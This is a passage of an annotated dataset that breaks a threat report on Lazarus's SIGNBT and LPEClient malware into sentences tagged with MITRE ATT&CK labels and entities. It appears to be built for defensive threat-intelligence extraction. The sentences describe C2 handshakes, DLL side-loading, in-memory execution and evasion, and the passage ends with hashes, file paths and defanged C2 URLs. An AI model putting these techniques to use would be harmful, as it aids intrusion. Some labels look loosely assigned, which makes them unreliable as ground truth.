"sentence_id": 55, "context_before": "Specifically, it checks to see if the response data contains a hard-coded HTML script.", "sentence_text": "1 \nDuring the validation process, the malware decodes the first 12 bytes from the C2 server using base64, replacing the spaces with plus signs to create a seven-character string.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Decode C2 response data using base64 during validation.", "entities": [ { "text": "decodes the first 12 bytes from the C2 server using base64", "start": 211, "end": 269, "label": "Action" }, { "text": "C2 server", "start": 247, "end": 256, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p5-s56-fcc754", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, "sentence_id": 56, "context_before": "1 \nDuring the validation process, the malware decodes the first 12 bytes from the C2 server using base64, replacing the spaces with plus signs to create a seven-character string.", "sentence_text": "This process is then repeated with the next 12 bytes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p5-s57-3c58cf", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, "sentence_id": 57, "context_before": "This process is then repeated with the next 12 bytes.", "sentence_text": "The first seven characters from each set are then XORed and compared to the “success” string.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p5-s58-fade3b", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, "sentence_id": 58, "context_before": "The first seven characters from each set are then XORed and compared to the “success” string.", "sentence_text": "This repetitive procedure is applied to every HTTP communication sequence to verify that the response aligns with the expected “success” criterion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p5-s59-ab0e23", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, "sentence_id": 59, "context_before": "This repetitive procedure is applied to every HTTP communication sequence to verify that the response aligns with the expected “success” criterion.", "sentence_text": "Next, the malware sends HTTP requests with the SIGNBTKE header, and if it receives a “success” message from the C2 server, it activates the getInfo function within the CCBrush class.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Send HTTP requests and activate function upon successful C2 response.", "entities": [ { "text": "sends HTTP requests with the SIGNBTKE header", "start": 18, "end": 62, "label": "Action" }, { "text": "activates the getInfo function within the CCBrush class", "start": 126, "end": 181, "label": "Action" }, { "text": "SIGNBTKE header", "start": 47, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "C2 server", "start": 112, "end": 121, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p6-s60-c77417", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 6, "sentence_id": 60, "context_before": "Next, the malware sends HTTP requests with the SIGNBTKE header, and if it receives a “success” message from the C2 server, it activates the getInfo function within the CCBrush class.", "sentence_text": "The data received from the C2 server is decrypted using AES with a decryption key obtained from a SIGNBTLG HTTP request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Decrypt C2 data using AES with key from HTTP request.", "entities": [ { "text": "is decrypted using AES with a decryption key obtained from a SIGNBTLG HTTP request", "start": 37, "end": 119, "label": "Action" }, { "text": "C2 server", "start": 27, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "SIGNBTLG HTTP request", "start": 98, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p6-s61-353688", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 6, "sentence_id": 61, "context_before": "The data received from the C2 server is decrypted using AES with a decryption key obtained from a SIGNBTLG HTTP request.", "sentence_text": "If there are problems, the malware uses the SIGNBTFI prefix to convey the nature of the problem or failure in communication.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Use SIGNBTFI prefix to communicate errors.", "entities": [ { "text": "uses the SIGNBTFI prefix to convey the nature of the problem or failure in communication", "start": 35, "end": 123, "label": "Action" }, { "text": "SIGNBTFI prefix", "start": 44, "end": 59, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p6-s62-70028e", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 6, "sentence_id": 62, "context_before": "If there are problems, the malware uses the SIGNBTFI prefix to convey the nature of the problem or failure in communication.", "sentence_text": "To summarize, the C2 communication process can be described as follows:\nC2 communication process If the delivered data does not equal “keep”, indicating that specific instructions or actions are required, the malware proceeds to invoke the corresponding class and function for backdoor behavior.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Invoke class and function based on C2-delivered data.", "entities": [ { "text": "invoke the corresponding class and function for backdoor behavior", "start": 229, "end": 294, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p6-s63-923c43", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 6, "sentence_id": 63, "context_before": "To summarize, the C2 communication process can be described as follows:\nC2 communication process If the delivered data does not equal “keep”, indicating that specific instructions or actions are required, the malware proceeds to invoke the corresponding class and function for backdoor behavior.", "sentence_text": "The SIGNBT malware is equipped with an extensive set of functionalities designed to exert control over the victim’s system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p6-s64-c03a52", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 6, "sentence_id": 64, "context_before": "The SIGNBT malware is equipped with an extensive set of functionalities designed to exert control over the victim’s system.", "sentence_text": "To perform these functions, the malware receives instructions from the C2 server in the form of a class name, function name, and any necessary parameters.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Receive instructions from C2 server to perform functions.", "entities": [ { "text": "receives instructions from the C2 server in the form of a class name, function name, and any necessary parameters", "start": 40, "end": 153, "label": "Action" }, { "text": "C2 server", "start": 71, "end": 80, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p6-s65-67915f", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 6, "sentence_id": 65, "context_before": "To perform these functions, the malware receives instructions from the C2 server in the form of a class name, function name, and any necessary parameters.", "sentence_text": "It then executes the relevant function embedded in the malware’s codebase.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute function embedded in malware codebase.", "entities": [ { "text": "executes the relevant function embedded in the malware’s codebase", "start": 8, "end": 73, "label": "Action" }, { "text": "malware", "start": 55, "end": 62, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s66-e8931c", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 66, "context_before": "It then executes the relevant function embedded in the malware’s codebase.", "sentence_text": "It’s important to note that the backdoor is capable of implanting an additional payload for auto execution, internally named “deploy”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p7-s67-f78a76", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 67, "context_before": "It’s important to note that the backdoor is capable of implanting an additional payload for auto execution, internally named “deploy”.", "sentence_text": "This backdoor function receives file paths via command-line arguments decrypted with AES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p7-s68-f73fa4", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 68, "context_before": "This backdoor function receives file paths via command-line arguments decrypted with AES.", "sentence_text": "Using this command, SIGNBT has been observed to implant the phantom DLL we already described in the SIGNBT loader section above.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": [ { "name": "Hijack Execution Flow: DLL Side-Loading", "id": "T1574.002" } ], "procedure": "The malware implants a malicious DLL to establish persistence via execution flow hijacking.", "entities": [ { "text": "has been observed to implant", "start": 27, "end": 55, "label": "Action" }, { "text": "SIGNBT", "start": 20, "end": 26, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s69-26a301", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 69, "context_before": "Using this command, SIGNBT has been observed to implant the phantom DLL we already described in the SIGNBT loader section above.", "sentence_text": "Based on the analysis, it is evident that the actor’s initial compromise of the victim involved exploiting vulnerabilities within the software exploit.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit software vulnerabilities to compromise the victim.", "entities": [ { "text": "the actor", "start": 42, "end": 51, "label": "ThreatActor" }, { "text": "exploiting vulnerabilities within the software exploit", "start": 96, "end": 150, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s70-4da8d6", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 70, "context_before": "Based on the analysis, it is evident that the actor’s initial compromise of the victim involved exploiting vulnerabilities within the software exploit.", "sentence_text": "They then proceeded to deploy the SIGNBT malware using a DLL side-loading technique.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Deploy SIGNBT malware via DLL side-loading.", "entities": [ { "text": "deploy the SIGNBT malware using a DLL side-loading technique", "start": 23, "end": 83, "label": "Action" }, { "text": "SIGNBT malware", "start": 34, "end": 48, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s71-c559b7", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 71, "context_before": "They then proceeded to deploy the SIGNBT malware using a DLL side-loading technique.", "sentence_text": "Furthermore, the actor used the backdoor capability “deploy” to implant an additional payload for automated execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Use backdoor deploy capability to implant payload for automated execution.", "entities": [ { "text": "the actor", "start": 13, "end": 22, "label": "ThreatActor" }, { "text": "used the backdoor capability “deploy” to implant an additional payload for automated execution", "start": 23, "end": 117, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s72-5b38c5", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 72, "context_before": "Furthermore, the actor used the backdoor capability “deploy” to implant an additional payload for automated execution.", "sentence_text": "This multifaceted attack demonstrates a high level of sophistication and a deliberate effort to infiltrate and maintain control over the victim’s system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p7-s73-20a5ee", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 73, "context_before": "This multifaceted attack demonstrates a high level of sophistication and a deliberate effort to infiltrate and maintain control over the victim’s system.", "sentence_text": "LPEClient\nUsing the comprehensive backdoor as described above, the actor deploys additional malware in the victim’s memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploy additional malware in victim memory via backdoor.", "entities": [ { "text": "the actor", "start": 63, "end": 72, "label": "ThreatActor" }, { "text": "deploys additional malware in the victim’s memory", "start": 73, "end": 122, "label": "Action" }, { "text": "LPEClient", "start": 0, "end": 9, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s74-8558e2", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 74, "context_before": "LPEClient\nUsing the comprehensive backdoor as described above, the actor deploys additional malware in the victim’s memory.", "sentence_text": "Notably, these newly delivered malware variants predominantly execute in the system’s memory only, without touching the disk.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Execute malware in memory without writing to disk.", "entities": [ { "text": "execute in the system’s memory only, without touching the disk", "start": 62, "end": 124, "label": "Action" }, { "text": "malware variants", "start": 31, "end": 47, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s75-f72b51", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 75, "context_before": "Notably, these newly delivered malware variants predominantly execute in the system’s memory only, without touching the disk.", "sentence_text": "Based on our telemetry, the actor has been observed to deliver such tools as LPEClient and credential dumping utilities to the victim machines.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deliver LPEClient and credential dumping tools to victim machines.", "entities": [ { "text": "the actor", "start": 24, "end": 33, "label": "ThreatActor" }, { "text": "deliver such tools as LPEClient and credential dumping utilities to the victim machines", "start": 55, "end": 142, "label": "Action" }, { "text": "LPEClient", "start": 77, "end": 86, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s76-1ef69f", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 76, "context_before": "Based on our telemetry, the actor has been observed to deliver such tools as LPEClient and credential dumping utilities to the victim machines.", "sentence_text": "Additional payload delivered by SIGNBT The LPEClient malware is not new and was first discovered during an investigation of a defense contractor attack in 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p7-s77-390d71", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 77, "context_before": "Additional payload delivered by SIGNBT The LPEClient malware is not new and was first discovered during an investigation of a defense contractor attack in 2020.", "sentence_text": "It is designed to collect victim information and download additional payloads from a remote server to run in memory.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Collect victim information and download additional payloads from a remote server to execute in memory.", "entities": [ { "text": "collect victim information", "start": 18, "end": 44, "label": "Action" }, { "text": "download additional payloads from a remote server to run in memory", "start": 49, "end": 115, "label": "Action" }, { "text": "remote server", "start": 85, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p7-s78-b3ee92", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 7, "sentence_id": 78, "context_before": "It is designed to collect victim information and download additional payloads from a remote server to run in memory.", "sentence_text": "Although it has been previously 7/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p8-s79-a58b24", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 79, "context_before": "Although it has been previously 7/11", "sentence_text": "noted in our threat intelligence reports to our customers, recent discoveries indicate that LPEClient has undergone significant evolution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p8-s80-d2ced7", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 80, "context_before": "noted in our threat intelligence reports to our customers, recent discoveries indicate that LPEClient has undergone significant evolution.", "sentence_text": "It now employs advanced techniques to improve its stealth and avoid detection, such as disabling user-mode syscall hooking and restoring system library memory sections.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Disable syscall hooking and restore memory sections to evade detection.", "entities": [ { "text": "employs advanced techniques to improve its stealth and avoid detection, such as disabling user-mode syscall hooking and restoring system library memory sections", "start": 7, "end": 167, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p8-s81-29e469", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 81, "context_before": "It now employs advanced techniques to improve its stealth and avoid detection, such as disabling user-mode syscall hooking and restoring system library memory sections.", "sentence_text": "This indicates a continued effort by the threat actors to increase the sophistication and effectiveness of their malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p8-s82-3d36c3", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 82, "context_before": "This indicates a continued effort by the threat actors to increase the sophistication and effectiveness of their malware.", "sentence_text": "This particular malware consistently serves as the initial infection vector, enabling victim profiling and facilitating the delivery of additional payloads.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use malware as initial infection vector to profile victims and deliver additional payloads.", "entities": [ { "text": "malware", "start": 16, "end": 23, "label": "MalwareTool" }, { "text": "serves as the initial infection vector, enabling victim profiling and facilitating the delivery of additional payloads", "start": 37, "end": 155, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p8-s83-ceafe2", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 83, "context_before": "This particular malware consistently serves as the initial infection vector, enabling victim profiling and facilitating the delivery of additional payloads.", "sentence_text": "Over an extended period of time, one of these campaigns specifically targeted defense contractors and nuclear engineers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1598", "name": "Phishing for Information" } ], "procedure": "Target defense contractors and nuclear engineers over extended campaign.", "entities": [ { "text": "targeted defense contractors and nuclear engineers", "start": 69, "end": 119, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p8-s84-e12f16", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 84, "context_before": "Over an extended period of time, one of these campaigns specifically targeted defense contractors and nuclear engineers.", "sentence_text": "In a recent incident, the threat actor compromised a victim by delivering LPEClient via a Trojanized VNC or Putty client for an intermediate infection.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Deliver LPEClient via trojanized VNC or Putty client to compromise victim.", "entities": [ { "text": "the threat actor", "start": 22, "end": 38, "label": "ThreatActor" }, { "text": "compromised a victim by delivering LPEClient via a Trojanized VNC or Putty client", "start": 39, "end": 120, "label": "Action" }, { "text": "LPEClient", "start": 74, "end": 83, "label": "MalwareTool" }, { "text": "Trojanized VNC or Putty client", "start": 90, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p8-s85-cf7bda", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 85, "context_before": "In a recent incident, the threat actor compromised a victim by delivering LPEClient via a Trojanized VNC or Putty client for an intermediate infection.", "sentence_text": "Another campaign targeting the cryptocurrency industry was discovered in July 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p8-s86-0d2171", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 86, "context_before": "Another campaign targeting the cryptocurrency industry was discovered in July 2023.", "sentence_text": "Interestingly, the actor also used LPEClient malware in this case.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use LPEClient malware in the attack.", "entities": [ { "text": "the actor", "start": 15, "end": 24, "label": "ThreatActor" }, { "text": "used LPEClient malware", "start": 30, "end": 52, "label": "Action" }, { "text": "LPEClient malware", "start": 35, "end": 52, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p8-s87-160db0", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 87, "context_before": "Interestingly, the actor also used LPEClient malware in this case.", "sentence_text": "Prior to the introduction of the Gopuram cluster, LPEClient was used to deliver the subsequent malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use LPEClient malware to deliver subsequent malware.", "entities": [ { "text": "LPEClient was used to deliver the subsequent malware", "start": 50, "end": 102, "label": "Action" }, { "text": "LPEClient", "start": 50, "end": 59, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p8-s88-6c262a", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 8, "sentence_id": 88, "context_before": "Prior to the introduction of the Gopuram cluster, LPEClient was used to deliver the subsequent malware.", "sentence_text": "These three campaigns attributed to Lazarus in 2023 illustrate different initial infection vectors and infection chains, but they consistently relied on LPEClient malware to deliver the final payload.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use LPEClient malware to deliver final payload.", "entities": [ { "text": "relied on LPEClient malware to deliver the final payload", "start": 143, "end": 199, "label": "Action" }, { "text": "LPEClient malware", "start": 153, "end": 170, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p9-s89-5f63fa", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 89, "context_before": "These three campaigns attributed to Lazarus in 2023 illustrate different initial infection vectors and infection chains, but they consistently relied on LPEClient malware to deliver the final payload.", "sentence_text": "The Lazarus group remains a highly active and versatile threat actor in today’s cybersecurity landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p9-s90-b5c2c7", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 90, "context_before": "The Lazarus group remains a highly active and versatile threat actor in today’s cybersecurity landscape.", "sentence_text": "The threat actor has demonstrated a profound understanding of IT environments, refining their tactics to include exploiting vulnerabilities in high-profile software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit vulnerabilities in high-profile software.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "exploiting vulnerabilities in high-profile software", "start": 113, "end": 164, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p9-s91-a460ef", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 91, "context_before": "The threat actor has demonstrated a profound understanding of IT environments, refining their tactics to include exploiting vulnerabilities in high-profile software.", "sentence_text": "This approach allows them to efficiently spread their malware once initial infections are achieved.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p9-s92-d24cbb", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 92, "context_before": "This approach allows them to efficiently spread their malware once initial infections are achieved.", "sentence_text": "Moreover, the activities of this notorious actor transcend geographic boundaries and industry sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p9-s93-d5a549", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 93, "context_before": "Moreover, the activities of this notorious actor transcend geographic boundaries and industry sectors.", "sentence_text": "This underscores their recent and ongoing activity characterized by sophisticated methods and unwavering motivations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p9-s94-6ec362", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 94, "context_before": "This underscores their recent and ongoing activity characterized by sophisticated methods and unwavering motivations.", "sentence_text": "Indicators of Compromise SIGNBT loader 9cd90dff2d9d56654dbecdcd409e1ef3 %system%\\ualapi.dll 88a96f8730b35c7406d57f23bbba734d %system%\\ualapi.dll 54df2984e833ba2854de670cce43b823 %system%\\ualapi.dll Ae00b0f490b122ebab614d98bb2361f7 %system%\\ualapi.dll e6fa116ef2705ecf9677021e5e2f691e 31af3e7fff79bc48a99b8679ea74b589 C:\\GoogleD\\Coding\\JS\\Node\\winhttp.dll SIGNBT 9b62352851c9f82157d1d7fcafeb49d3 LPEClient 3a77b5054c36e6812f07366fb70b007d %systme%\\wbem\\wbemcomn.dll E89fa6345d06da32f9c8786b65111928 %ProgramData%\\Microsoft\\Windows\\ServiceSetting\\ESENT.dll File path C:\\GoogleD\\Coding\\JS\\Node\\SgrmLpac.exe C:\\GoogleD\\Coding\\JS\\Node\\winhttp.dll C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100a-a00-e14d9.tmp C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100b-a00-e14d9.tmp C:\\ProgramData\\ntuser.008.dat C:\\ProgramData\\ntuser.009.dat C:\\ProgramData\\ntuser.001.dat C:\\ProgramData\\ntuser.002.dat C:\\ProgramData\\Microsoft\\Windows\\ServiceSetting\\ESENT.dll", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p9-s95-62697e", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 9, "sentence_id": 95, "context_before": "Indicators of Compromise SIGNBT loader 9cd90dff2d9d56654dbecdcd409e1ef3 %system%\\ualapi.dll 88a96f8730b35c7406d57f23bbba734d %system%\\ualapi.dll 54df2984e833ba2854de670cce43b823 %system%\\ualapi.dll Ae00b0f490b122ebab614d98bb2361f7 %system%\\ualapi.dll e6fa116ef2705ecf9677021e5e2f691e 31af3e7fff79bc48a99b8679ea74b589 C:\\GoogleD\\Coding\\JS\\Node\\winhttp.dll SIGNBT 9b62352851c9f82157d1d7fcafeb49d3 LPEClient 3a77b5054c36e6812f07366fb70b007d %systme%\\wbem\\wbemcomn.dll E89fa6345d06da32f9c8786b65111928 %ProgramData%\\Microsoft\\Windows\\ServiceSetting\\ESENT.dll File path C:\\GoogleD\\Coding\\JS\\Node\\SgrmLpac.exe C:\\GoogleD\\Coding\\JS\\Node\\winhttp.dll C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100a-a00-e14d9.tmp C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100b-a00-e14d9.tmp C:\\ProgramData\\ntuser.008.dat C:\\ProgramData\\ntuser.009.dat C:\\ProgramData\\ntuser.001.dat C:\\ProgramData\\ntuser.002.dat C:\\ProgramData\\Microsoft\\Windows\\ServiceSetting\\ESENT.dll", "sentence_text": "C2 servers hxxp://ictm[.]or[.]kr/UPLOAD_file/board/free/edit/index[.]php hxxp://samwoosystem[.]co[.]kr/board/list/write[.]asp hxxp://theorigin[.]co[.]kr:443/admin/management/index[.]php hxxp://ucware[.]net/skins/PHPMailer-master/index[.]php 9/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p10-s96-c01cb5", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 10, "sentence_id": 96, "context_before": "C2 servers hxxp://ictm[.]or[.]kr/UPLOAD_file/board/free/edit/index[.]php hxxp://samwoosystem[.]co[.]kr/board/list/write[.]asp hxxp://theorigin[.]co[.]kr:443/admin/management/index[.]php hxxp://ucware[.]net/skins/PHPMailer-master/index[.]php 9/11", "sentence_text": "hxxp://www[.]friendmc[.]com/upload/board/asp20062107[.]asp\nhxxp://www[.]hankooktop[.]com/ko/company/info[.]asp\nhxxp://www[.]khmcpharm[.]com/Lib/Modules/HtmlEditor/Util/read[.]cer\nhxxp://www[.]vietjetairkorea[.]com/INFO/info[.]asp\nhxxp://yoohannet[.]kr/min/tmp/process/proc[.]php\nhxxps://admin[.]esangedu[.]kr/XPaySample/submit[.]php\nhxxps://api[.]shw[.]kr/login_admin/member/login_fail[.]php\nhxxps://hicar[.]kalo[.]kr/data/rental/Coupon/include/inc[.]asp\nhxxps://hspje[.]com:80/menu6/teacher_qna[.]asp\nhxxps://kscmfs[.]or[.]kr/member/handle/log_proc[.]php\nhxxps://kstr[.]radiology[.]or[.]kr/upload/schedule/29431_1687715624[.]inc\nhxxps://little-pet[.]com/web/board/skin/default/read[.]php\nhxxps://mainbiz[.]or[.]kr/SmartEditor2/photo_uploader/popup/edit[.]asp\nhxxps://mainbiz[.]or[.]kr/include/common[.]asp\nhxxps://new-q-cells[.]com/upload/newsletter/cn/frame[.]php\nhxxps://pediatrics[.]or[.]kr/PubReader/build_css[.]php\nhxxps://pms[.]nninc[.]co[.]kr/app/content/board/inc_list[.]asp\nhxxps://safemotors[.]co[.]kr/daumeditor/pages/template/template[.]asp\nhxxps://swt-keystonevalve[.]com/data/editor/index[.]php\nhxxps://vnfmal2022[.]com/niabbs5/upload/gongji/index[.]php\nhxxps://warevalley[.]com/en/common/include/page_tab[.]asp\nhxxps://www[.]blastedlevels[.]com/levels4SqR8/measure[.]asp\nhxxps://www[.]droof[.]kr/Board/htmlEdit/PopupWin/Editor[.]asp\nhxxps://www[.]friendmc[.]com:80/upload/board/asp20062107[.]asp\nhxxps://www[.]hanlasangjo[.]com/editor/pages/page[.]asp\nhxxps://www[.]happinesscc[.]com/mobile/include/func[.]asp\nhxxps://www[.]he